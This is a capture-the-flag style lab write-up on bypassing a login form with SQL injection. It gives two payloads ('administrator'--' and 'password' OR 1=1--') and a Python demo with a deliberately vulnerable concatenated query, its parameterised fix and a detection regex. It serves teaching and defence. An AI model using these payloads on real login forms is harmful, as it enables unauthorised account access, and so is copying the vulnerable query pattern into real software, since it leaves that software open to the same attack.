
SQL injection vulnerability allowing login bypass


Let's log in using the following credentials:

Username: test
Password: test

The resultant SQL query will be:

SELECT username FROM users WHERE username = 'test' AND password = 'test'

This will obviously not log us in as the administrator.

Method 1

We can next try the following credentials:

Username: administrator'--
Password: password

The resultant SQL query will be:

SELECT username FROM users WHERE username = 'administrator'--' AND password = 'password'

Since the `--` sequence comments out the rest of the WHERE clause (the part that checks the password), we will be logged in as administrator even if the password is not password.

Method 2

We can next try the following credentials:

Username: administrator
Password: password' OR 1=1--

The resultant SQL query will be:

SELECT username FROM users WHERE username = 'administrator' AND password = 'password' OR 1=1--'

Since 1=1 is always true, and anything OR true is true, the WHERE clause matches every row regardless of whether the password is password, and the application logs us in with the first row returned.
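To make both methods concrete, here is an added, self-contained Python example (not part of the original writeup or the lab's code) that reproduces the string-concatenated login query against a constructed in-memory SQLite table, shows the two payloads above bypassing it, and puts the parameterised version beside it so the fix is visible. The table contents, the `build_vulnerable_query`, `vulnerable_login`, `safe_login` and `looks_like_injection` helpers, and the sample passwords are all assumptions made for the demonstration.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample users table; the passwords are placeholders,
    not the lab's real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("administrator", "placeholder-admin-pw"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Mirrors the pattern behind the lab's login form: the submitted
    values are spliced straight into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Returns the username of the first matching row (what a naive app
    treats as 'the user who just logged in'), or None if no row matches."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Same lookup with bound parameters: the driver passes the values
    separately from the SQL, so quotes and '--' in the input stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def looks_like_injection(value: str) -> bool:
    """Cheap log-side check for the two payload shapes used above: a quote
    followed by a comment marker or by an OR tautology. A detection aid
    only; parameterised queries are the actual fix."""
    return re.search(r"'\s*(--|or\s+1\s*=\s*1)", value, re.IGNORECASE) is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("test", "test"), ("administrator'--", "password"),
                     ("administrator", "password' OR 1=1--")]:
        print(build_vulnerable_query(user, pw))
        print("  vulnerable ->", vulnerable_login(db, user, pw))
        print("  safe       ->", safe_login(db, user, pw))
        print("  flagged    ->", looks_like_injection(user) or looks_like_injection(pw))
```

Running the script prints the three queries from the writeup exactly as the lab would build them; the vulnerable path returns `administrator` for Method 1 and a row for Method 2 while the parameterised path returns nothing for either, because the bound values never become part of the SQL grammar.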


We have solved the lab.
